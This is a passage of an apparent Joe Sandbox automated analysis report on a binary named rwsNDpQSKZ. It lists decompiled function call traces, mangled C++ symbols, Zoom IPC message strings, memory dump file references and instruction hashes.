                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.audiochange.notify,00009E91,bUse,bMute,00000004), ref: 00C72AD7
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: bMute$bUse$com.zoom.app.cci.ccivideo.audiochange.notify
                • API String ID: 3124793654-3936263515
                • Opcode ID: c08bf01d22a685ed943562f5df09d6f2c0b21948dc6f4bbf225afc6998f9e11a
                • Instruction ID: a4ffb0fcf6aab3d16bed3ec36d79d3ac9d04fac8cc7cedd540a00881eca516df
                • Opcode Fuzzy Hash: c08bf01d22a685ed943562f5df09d6f2c0b21948dc6f4bbf225afc6998f9e11a
                • Instruction Fuzzy Hash: E5E092B0A403C97BEB20AB409C49B3A62A5AB90B19F548A19B1115A3D1CBF44C48D775
                Function 00C76A60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76A67
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.ps.notify.component.download_progress,0001388C,componentType,progress,00000004), ref: 00C76A87
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.ps.notify.component.download_progress$componentType$progress
                • API String ID: 3124793654-2911181938
                • Opcode ID: 61cce8f296291597c050410beecfc2d7c6f3ff8bafee605938fe24f0cf407761
                • Instruction ID: a3c46efa84af2093e3acd39eb6075f7e9a581b12afb6d6e34051f08ae939fade
                • Opcode Fuzzy Hash: 61cce8f296291597c050410beecfc2d7c6f3ff8bafee605938fe24f0cf407761
                • Instruction Fuzzy Hash: 7CE092B1A50B84BBD7107B549C0AB2F6264EF85F59F40467CB1045A386CBF50E40D7B8
                Function 00C76A00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76A07
                • ??0?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.ps.notify.component.download_result,00013889,componentType,success,00000004), ref: 00C76A27
                  • Part of subcall function 00C889D0: __EH_prolog3.LIBCMT ref: 00C889D7
                  • Part of subcall function 00C889D0: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C888F2,?,?,?,?,00000004,00C88825,?,?,?,?,?), ref: 00C889EA
                  • Part of subcall function 00C90AF2: __EH_prolog3_GS.LIBCMT ref: 00C90AF9
                  • Part of subcall function 00C90AF2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B1F
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B4D
                  • Part of subcall function 00C90AF2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B8A
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90BBA
                  • Part of subcall function 00C90AF2: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response), ref: 00C90C18
                  • Part of subcall function 00C90AF2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID), ref: 00C90C35
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.ps.notify.component.download_result$componentType$success
                • API String ID: 3124793654-1950816445
                • Opcode ID: 6c2a75e6b47290fb1d1297914c820d66d77054fcc74a7b87665df1f47e793d5c
                • Instruction ID: e3d0f70f03fdb77aec0a398dcf746ccc117e2a97567866f8b7342696dc6b4a95
                • Opcode Fuzzy Hash: 6c2a75e6b47290fb1d1297914c820d66d77054fcc74a7b87665df1f47e793d5c
                • Instruction Fuzzy Hash: 35E092B0A40B847BD720BB484889B2E6264BB80B6AF50456CB1046A3D2CBF00E44D7B5
                Function 00C68A10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68A17
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.callcommand,0000271E,MeetingID,cmd,00000004), ref: 00C68A37
                  • Part of subcall function 00C85EF0: __EH_prolog3.LIBCMT ref: 00C85EF7
                  • Part of subcall function 00C85EF0: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85E52,?,?,?,?,00000004,00C85D95,?,?,?,?,?), ref: 00C85F0A
                  • Part of subcall function 00C84FAD: __EH_prolog3_GS.LIBCMT ref: 00C84FB4
                  • Part of subcall function 00C84FAD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C84FDA
                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85008
                  • Part of subcall function 00C84FAD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85045
                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85075
                  • Part of subcall function 00C84FAD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request), ref: 00C850D3
                  • Part of subcall function 00C84FAD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction), ref: 00C850F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: MeetingID$cmd$com.Zoom.app.callcommand
                • API String ID: 2703795933-1204139483
                • Opcode ID: 727f27759f78041332d70fc966eccaef08e894dba149ad9766a39c1985665219
                • Instruction ID: 35faa826b44dd2c5bc12cdfc8cf70aae8d97f40a9e1a170df356b723d7d306ef
                • Opcode Fuzzy Hash: 727f27759f78041332d70fc966eccaef08e894dba149ad9766a39c1985665219
                • Instruction Fuzzy Hash: 23E09270614758ABE7106B45ACC6B2E63B5AB54B1DF9005ADF2015B3D1CAF40D84D774
                Function 00C74A30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74A37
                • ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.get.presence,00002780,UserList,Subscribe,00000004), ref: 00C74A57
                  • Part of subcall function 00C8CDD0: __EH_prolog3.LIBCMT ref: 00C8CDD7
                  • Part of subcall function 00C8CDD0: ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8CD32,?,?,?,?,00000004,00C8CC15,?,?,?,?,?), ref: 00C8CDEA
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: Subscribe$UserList$com.Zoom.app.conf.get.presence
                • API String ID: 2703795933-1589503580
                • Opcode ID: 3d5bfdfba13f6b411778b58fa83b9caf35f447b117297697406bb48bf9689cff
                • Instruction ID: aae2423359c08a65d5991c12f59ba86f6b4cd6736f92722e61d3a33e5f0e406f
                • Opcode Fuzzy Hash: 3d5bfdfba13f6b411778b58fa83b9caf35f447b117297697406bb48bf9689cff
                • Instruction Fuzzy Hash: 3BE092B0A85794ABD3217B849C4AB2A62A8DBA4B19F400438F1149F3D1CBF00D45DB7A
                Function 00C76B80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76B87
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.conf.compliant.meeting.autocall.join,000027AE,call_number,participant_id,00000004), ref: 00C76BA7
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: call_number$com.zoom.conf.compliant.meeting.autocall.join$participant_id
                • API String ID: 9112088-1674436807
                • Opcode ID: 6e1c2c6dda72f97d6b6ed9f8f3898ba09fa0b14e88d41bc96b8ca1e6b7ec546b
                • Instruction ID: a0fde2fdddf41ef096fecb2545dfe9b87602989ef6acf3bfd3ccbeb9a9b41710
                • Opcode Fuzzy Hash: 6e1c2c6dda72f97d6b6ed9f8f3898ba09fa0b14e88d41bc96b8ca1e6b7ec546b
                • Instruction Fuzzy Hash: F0E022F1A04B98AFD3206B41AC0AB2E21B4AB50B2EF504478F2089F3D0CBF14D00DBB4
                Function 00C76B20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76B27
                • ??0?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.ps.query.component.exist.result,0001388B,componentType,exist,00000004), ref: 00C76B47
                  • Part of subcall function 00C889D0: __EH_prolog3.LIBCMT ref: 00C889D7
                  • Part of subcall function 00C889D0: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C888F2,?,?,?,?,00000004,00C88825,?,?,?,?,?), ref: 00C889EA
                  • Part of subcall function 00C90AF2: __EH_prolog3_GS.LIBCMT ref: 00C90AF9
                  • Part of subcall function 00C90AF2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B1F
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B4D
                  • Part of subcall function 00C90AF2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B8A
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90BBA
                  • Part of subcall function 00C90AF2: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response), ref: 00C90C18
